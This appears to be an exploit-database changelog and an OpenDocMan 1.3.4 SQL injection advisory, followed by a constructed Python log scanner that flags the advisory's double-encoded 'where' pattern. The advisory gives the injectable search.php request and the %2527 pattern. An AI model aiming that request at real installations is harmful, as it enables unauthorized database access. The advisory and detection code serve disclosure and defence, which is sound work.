
2 changes to exploits/shellcodes

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)
Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)
Splunk Enterprise 7.2.4 - Custom App Remote Command Execution (Persistent Backdoor / Custom Binary)
elFinder 2.1.47 - Command Injection vulnerability in the PHP connector
elFinder 2.1.47 - 'PHP connector' Command Injection
OpenDocMan 1.3.4 - 'search.php where' SQL Injection
Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)
Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes)
Linux/x86 - XOR Encoder / Decoder execve() /bin/sh Shellcode (45 bytes)
===========================================================================================
# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection
# CVE: N/A
# Date: 05/03/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
# Software Link: https://sourceforge.net/projects/opendocman/files/
# Version: v1.3.4
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: OpenDocMan is a web based document management
system (DMS) written in PHP designed
to comply with ISO 17025 and OIE standard for document management.
It features fine grained control of access to files, and automated
install and upgrades.
===========================================================================================
# POC - SQLi
# Parameters : where
# Attack Pattern : %2527
# GET Request :
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
===========================================================================================
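
A log check for the request above, added here as an example and not part of the original advisory: it flags `where` values on `search.php` that decode to quote or comment characters, and marks those that needed more than one percent-decoding pass, as `%2527` does. The log lines, the benign value `all` and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters a field selector should never decode to (quotes, backslash, statement/comment marks).
SUSPICIOUS = re.compile(r"['\"\\;]|--|/\*")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_layers(value, max_rounds=3):
    """Percent-decode until stable; return (final value, number of passes that changed it)."""
    rounds = 0
    while rounds < max_rounds and unquote(value) != value:
        value, rounds = unquote(value), rounds + 1
    return value, rounds

def inspect_request(url, param="where"):
    """Return a finding for a search.php request whose `param` hides SQL metacharacters."""
    parts = urlsplit(url)
    if not parts.path.endswith("/search.php"):
        return None
    # parse_qsl performs the first decode, as the web server does before the app sees the value.
    for name, once in parse_qsl(parts.query, keep_blank_values=True):
        if name == param:
            final, extra = decode_layers(once)
            if SUSPICIOUS.search(final):
                return {"param": name, "decoded": final, "double_encoded": extra > 0}
    return None

def scan(lines):
    """Return (line number, finding) for every flagged access-log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        finding = inspect_request(m.group(1)) if m else None
        if finding:
            hits.append((n, finding))
    return hits

# Constructed access-log lines (documentation IP range, made-up status and size).
_L = ('203.0.113.7 - - [05/Mar/2019:10:01:02 +0000] "GET /opendocman/{}?submit=submit&sort_by=id'
      '&where={}&sort_order=asc&keyword=Training+Manual&exact_phrase=on HTTP/1.1" 200 5120')
SAMPLE_LOG = [
    _L.format("search.php", "all"),    # benign value (assumed)
    _L.format("search.php", "%2527"),  # the attack pattern given on this page
    _L.format("search.php", "%27"),    # single-encoded quote
    _L.format("index.php", "%2527"),   # different script, not inspected
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A `double_encoded` hit means the quote only appears after a second decode, so a filter that inspects the value after a single decode would still see `%27`.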